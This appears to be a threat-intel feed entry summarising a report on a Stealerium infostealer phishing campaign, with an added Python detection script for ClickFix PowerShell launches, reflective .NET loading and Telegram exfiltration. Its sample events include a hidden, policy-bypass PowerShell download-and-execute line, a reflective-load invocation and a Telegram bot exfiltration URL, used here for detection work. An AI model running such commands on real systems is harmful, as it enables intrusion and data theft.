Stealerium Unmasked: Inside a Multi-Lure, Multi-Stage Stealer Campaign
ID: a4de879a-f578-5357-baad-aee57bc77ae9
STIX ID: report--a4de879a-f578-5357-baad-aee57bc77ae9
Feed Name: LevelBlue SpiderLabs Blog
This report analyzes an active, operator-driven phishing campaign that consistently deploys the Stealerium .NET infostealer via password-protected ZIP lures and a user-assisted SVG "ClickFix" PowerShell chain. The actors evolved their delivery (HTML credential harvesting, HTML smuggling, and multiple fallback loaders) while keeping a stable execution core that performs reflective in-memory loading, credential and file theft, persistence, AV interference, and exfiltration via Telegram and cloud hosts. The build also contains an operator-triggered ransomware component, and the report includes observed C2 endpoints and IoCs to support detection and mitigation.
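As an added illustration (not code from the report or from LevelBlue SpiderLabs), the Python below sketches the kind of endpoint-log triage a detection engineer would write for three behaviours the summary names: a user-assisted "ClickFix" PowerShell launch (script host spawned from the interactive shell with hide/bypass/download flags), reflective in-memory .NET loading, and exfiltration to the Telegram Bot API. The event schema, field names and every sample event are constructed for the example; the report's real C2 endpoints and IoCs are not reproduced here, and the regexes are generic heuristics, not signatures taken from the report.

```python
"""Heuristic triage of process-creation and network events for ClickFix-style
PowerShell launches, reflective .NET loading and Telegram Bot API exfiltration.

Added example: the simplified event schema and the sample events are
constructed for illustration and are not taken from the report."""
import re

# Run-dialog / paste-and-run launches arrive with explorer.exe as the parent.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

# Command-line fragments typical of copy-pasted PowerShell one-liners
# (hidden window, encoded command, policy bypass, download-and-eval).
CLICKFIX_FLAGS = re.compile(
    r"(?i)(-w(?:indowstyle)?\s+hidden"
    r"|-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"
    r"|-ep\s+bypass|-executionpolicy\s+bypass"
    r"|\biex\b|invoke-expression|downloadstring|invoke-webrequest"
    r"|\biwr\b|\bcurl\b)")

# Loading a .NET assembly from a byte array instead of from disk.
REFLECTIVE_LOAD = re.compile(
    r"(?i)\[(?:System\.)?Reflection\.Assembly\]::Load\(")

# Telegram Bot API URLs carry the bot token in the path; the numeric id
# followed by a colon and the secret is the stable shape to match on.
TELEGRAM_BOT = re.compile(r"(?i)api\.telegram\.org/bot[0-9]+:[A-Za-z0-9_-]+/")


def score_process_event(evt):
    """Return the list of detection reasons that fire for one process event."""
    reasons = []
    parent = evt.get("parent", "").lower()
    image = evt.get("image", "").lower()
    cmdline = evt.get("cmdline", "")
    flags = CLICKFIX_FLAGS.findall(cmdline)
    if parent in INTERACTIVE_PARENTS and image in SCRIPT_HOSTS and flags:
        reasons.append("clickfix: interactive script host with "
                       "%d suspicious flag(s)" % len(flags))
    if REFLECTIVE_LOAD.search(cmdline):
        reasons.append("reflective-load: Assembly.Load in command line")
    return reasons


def score_network_event(evt):
    """Return the list of detection reasons that fire for one network event."""
    reasons = []
    if TELEGRAM_BOT.search(evt.get("url", "")):
        reasons.append("exfil: Telegram Bot API call from %s"
                       % evt.get("image", "?"))
    return reasons


def triage(events):
    """Return [(event_id, reasons)] for every event with at least one reason."""
    hits = []
    for evt in events:
        if evt.get("type") == "process":
            reasons = score_process_event(evt)
        elif evt.get("type") == "network":
            reasons = score_network_event(evt)
        else:
            reasons = []
        if reasons:
            hits.append((evt["id"], reasons))
    return hits


# Constructed sample events (hypothetical; example.invalid is a reserved name).
SAMPLE_EVENTS = [
    {"id": 1, "type": "process", "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -w hidden -ep bypass -c \"iex (New-Object "
                "Net.WebClient).DownloadString('https://example.invalid/a')\""},
    # Benign-looking scheduled script: bypass flag but not interactive.
    {"id": 2, "type": "process", "parent": "services.exe",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass "
                "-File C:\\ProgramData\\backup\\nightly.ps1"},
    {"id": 3, "type": "process", "parent": "explorer.exe",
     "image": "powershell.exe",
     "cmdline": 'powershell.exe -nop -c "[System.Reflection.Assembly]::'
                'Load($bytes).EntryPoint.Invoke($null,$null)"'},
    {"id": 4, "type": "network", "image": "powershell.exe",
     "url": "https://api.telegram.org/bot123456789:AAExampleTokenExample/"
            "sendDocument"},
    # Ordinary web client use of Telegram: no bot token in the path.
    {"id": 5, "type": "network", "image": "chrome.exe",
     "url": "https://web.telegram.org/k/"},
    {"id": 6, "type": "process", "parent": "explorer.exe",
     "image": "notepad.exe", "cmdline": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for event_id, reasons in triage(SAMPLE_EVENTS):
        print(event_id, "; ".join(reasons))
```

Event 2 is deliberately left unflagged: a policy-bypass flag alone is too noisy to alert on, and the parent-process condition is what separates a paste-and-run launch from scheduled administration. In a real deployment the Telegram rule would be paired with the report's own C2 endpoints and the ZIP/SVG delivery artefacts rather than used on its own.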
